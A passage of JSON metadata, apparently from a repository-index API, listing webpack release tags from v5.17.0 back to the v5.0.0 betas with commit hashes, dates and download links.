:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.